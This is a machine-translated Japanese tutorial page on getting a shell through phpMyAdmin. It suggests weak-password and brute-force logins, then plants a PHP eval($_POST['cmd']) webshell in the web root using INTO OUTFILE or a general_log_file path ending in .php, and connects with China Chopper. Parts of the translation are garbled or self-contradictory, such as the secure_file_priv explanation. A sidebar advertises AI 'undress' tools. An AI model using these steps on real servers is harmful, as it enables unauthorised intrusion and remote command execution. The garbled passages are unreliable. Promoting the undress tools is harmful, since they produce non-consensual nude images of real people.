以下は、phpmyadmin のチュートリアル コラムで、PhpMyAdmin のバックグラウンド getshell (ペネトレーション テスト) を紹介します。
#PhpMyAdmin の概要PhpMyAdmin は PHP に基づいており、Web ベースで構造化されています。 Web サイトホスト上の #MySQL データベース管理ツール を使用すると、管理者は Web インターフェイスを使用して MySQL データベースを管理できます。この Web インターフェイスは、特に大量のデータをインポートおよびエクスポートする場合に、複雑な SQL 構文を簡単に入力するためのより良い方法となります。
対象の情報を収集、検出した後、phpmyadmin ディレクトリが存在することが判明した場合 (
http://ip:port/phpmyadmin/
を試してください)、脆弱なパスワード (、アカウントの root パスワード root を直接試すことができます) を使用して管理背景を攻撃したり、ブルート フォース クラックしたりするなど、getshell にはさまざまな方法があります。 
outfile にエクスポートするトロイの木馬
Web サイト内にトロイの木馬を挿入したい場合は、Web サイトの絶対パスを知っている必要があることが前提となります。エラーを報告してパスを取得したり、phpinfo.php を渡したりするなど、さまざまな方法があります (別のブログ投稿を参照してください: https://blog.csdn.net/weixin_39190897/article/details/99078864)。
最も便利な方法は、
select @@basedir; を使用して直接確認することです (ただし、他の方法しか見つからず、見つからない場合もあります): 
上記のフィードバックによると、MySQL の場所は
ディレクトリにあることがわかります。 Web サイトのパスを取得した後、トロイの木馬のアップロードを試みることができます。最も一般的に使用される方法は、
を通じて Web サイトのルート ディレクトリにトロイの木馬の文を直接書き込むことです。 #出力ファイル 'D:\soft\phpStudy\www\xxx.php' に '' を選択します;
しかし、新しいバージョンの mysql では、この文は正常に実行されませんでした。
Mysql の新機能
secure_file_priv
は、ファイルの読み取りと書き込みに影響を与えます。このパラメータは、インポートとエクスポートを制限するために使用されます。
show global variables like '%secure%'; コマンドを使用して、このパラメータを表示できます。
secure_file_priv
が NULL の場合、Mysql が NULL であることを意味します。は制限されていません。インポートとエクスポートは許可されているため、エラーが発生します。ステートメントを正常にエクスポートするには、Mysql フォルダー内の
my.ini ファイルを変更し、secure_file_priv ="" を [mysqld]:# に追加する必要があります。 ##secure_file_priv
の値に特定の値がない場合は、mysqld のインポート/エクスポートに制限がなく、この時点でエクスポート コマンドを実行できることを意味します。 
Mysql ログ ファイルの使用Mysql バージョン 5.0 以降ではログ ファイルが作成され、ログのグローバル変数を変更して getshell を実行することもできます。ただし、生成されたログに対する読み取りおよび書き込み権限も必要です。 (注: Linux での個人テストは、権限の問題により失敗しました)。まず、2 つの MySQL グローバル変数、
と
general_log file を紹介します。 general log
- General log file はログの保存ステータスを指します。ログの保存パス。
- #ログ ステータスを表示するコマンド: show variables like '%general%';
## 上記の設定では、全般がオンになっている場合、 実行された SQL ステートメントは、WIN-30DFNC8L78A.log
ファイル 
に表示されます。
その後、general_log_file の値が変更されると、それに応じて実行される SQL ステートメントが生成され、その後 getshell が生成されます。 
これに応じて、xxx.php ファイルが生成されます。 
xxx.php ファイルにトロイの木馬の文を書き込みます: SELECT ' php eval ($_POST["cmd"]);?>'
次に、ログ ファイルに記録されたトロイの木馬のステートメントを確認できます。 
最後に、 China Chopper が接続、getshell : 
以上がPhpMyAdmin バックグラウンド getshell (侵入テスト)の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
PHPMYADMIN:データベース管理用のWebベースのインターフェイスApr 27, 2025 am 12:20 AMPhpMyAdminは、MySQLおよびMariaDBデータベースを管理するためのWebベースのツールです。 1)ブラウザを介してさまざまなデータベース操作を可能にする直感的なユーザーインターフェイスを提供します。 2)PHPMyAdminは、PHPスクリプトを介してデータベースと対話し、操作をSQLコマンドに変換します。 3)ユーザーは、基本的なデータブラウジングや編集から高度なSQLクエリやビュー管理まで、操作を実行できます。 4)一般的な問題には、接続障害とSQL構文エラーが含まれます。これは、構成と構文をチェックすることで解決できます。 5)パフォーマンスの最適化の提案には、ピーク期間中の大規模なデータ操作を回避し、定期的にデータベースを維持することが含まれます。
phpmyAdmin:テーブル、データベース、およびユーザーの管理Apr 26, 2025 am 12:01 AMPHPMyAdminを使用して、テーブル、データベース、およびユーザーを管理できます。 1)テーブルの作成:ID、ユーザー名、電子メールフィールドなど、インターフェイスを介してユーザーという名前のテーブルを作成します。 2)エクスポートデータベース:my_databaseとそのユーザーテーブルの構造とデータをエクスポートします。 3)ユーザーの管理:新しいユーザーを作成し、my_databaseにすべてのアクセス許可を許可します。
PHPMYADMINの使用:データベース管理者向けガイドApr 25, 2025 am 12:12 AMPhpMyAdminは、データベースを管理するための直感的なインターフェイスを提供するWebベースのMySQLデータベース管理ツールです。 1.データベースとテーブルの作成、変更、削除、SQLクエリの実行、データのインポート、エクスポート、ユーザー管理と許可設定の実行を可能にします。 2。MySQLサーバーとの接続を確立することにより、PHPMyAdminはユーザー要求をSQLコマンドに変換し、それらを実行します。 3.基本的な使用法には、テーブルデータの表示が含まれ、高度な使用法は複雑なSQLクエリをサポートしています。 4.接続障害やクエリの構文エラーなどの一般的なエラーは、サーバーのステータスをチェックしてSQLエディターを使用してデバッグできます。 5.パフォーマンスの最適化は、一般的なフィールドのインデックスを作成し、定期的にデータベースをバックアップし、構造をきれいに保つことで実現できます。
関係を理解する:mysqlとphpmyadminApr 24, 2025 am 12:05 AMMySQLとPHPMyAdminの関係は、MySQLがデータを保存し、PHPMyAdminがHTTPプロトコルを介してこのデータを管理することです。 1.MYSQLは、さまざまなオペレーティングシステムとプロジェクトの要件をサポートするオープンソースのリレーショナルデータベース管理システムです。 2.PhpMyAdminは、MySQLデータベースを管理するための直感的なインターフェイスを提供し、SQLクエリとデータのインポートとエクスポートをサポートするWebベースのツールです。 3.PhpMyAdminは、SQLクエリを生成することによりMySQLサーバーと通信し、ユーザーはインターフェイスを介してデータベースを操作できます。 4. phpmyAdminを使用して、データベースとテーブルを作成し、クエリを実行し、データをインポートおよびエクスポートし、最適化されたクエリや管理権限などの高度な機能をサポートします。
phpmyadminとmysql:完璧な組み合わせApr 23, 2025 am 12:04 AMphpmyadminandmysqltogetherentabasabasemanagementeaseaseaseaseaseaseaseaseasease.1)phpmyadminoffersauser-frendly interfaceformangingmysqldatabase、2)italowsexecution ofsqulies、exportdatabases、andmanagement ofsofdatabases、およびmanagemenage foreasexecution of andmaingermissions、3)
MySQLおよびPHPMYADMIN:コア機能と関数Apr 22, 2025 am 12:12 AMMySQLとPHPMyAdminは、強力なデータベース管理ツールです。 1)MySQLは、データベースとテーブルを作成し、DMLおよびSQLクエリを実行するために使用されます。 2)PHPMyAdminは、データベース管理、テーブル構造管理、データ操作、ユーザー許可管理のための直感的なインターフェイスを提供します。
phpmyAdmin:SQLクエリの生成と実行Apr 21, 2025 am 12:03 AMPHPMyAdminでSQLクエリを生成および実行する方法は次のとおりです。1。SQLタブにクエリを入力し、[クリック]を実行して実行します。 2。結合を使用してテーブルデータをマージします。 3.クエリを最適化するときは、インデックスと制限を使用します。 PhpMyAdminは、直感的なインターフェイスを介してデータベース管理を簡素化し、SQLクエリ操作を基本から高度にサポートします。
mysqlとphpmyadmin:それらがどのように連携するかApr 20, 2025 am 12:05 AMデータベース管理とユーザーフレンドリーなインターフェイスを組み合わせる必要があります。これにより、効率と利便性が向上する可能性があるためです。 1)MySQLは複雑なデータストレージとクエリを処理します。2)PHPMyAdminは、管理を簡素化するための直感的なWebインターフェイスを提供します。
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。
人気の記事
ホットツール
VSCode Windows 64 ビットのダウンロード
Microsoft によって発売された無料で強力な IDE エディター
SublimeText3 Linux 新バージョン
SublimeText3 Linux 最新バージョン
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。
ホットトピック
7752
15164314139852129325123429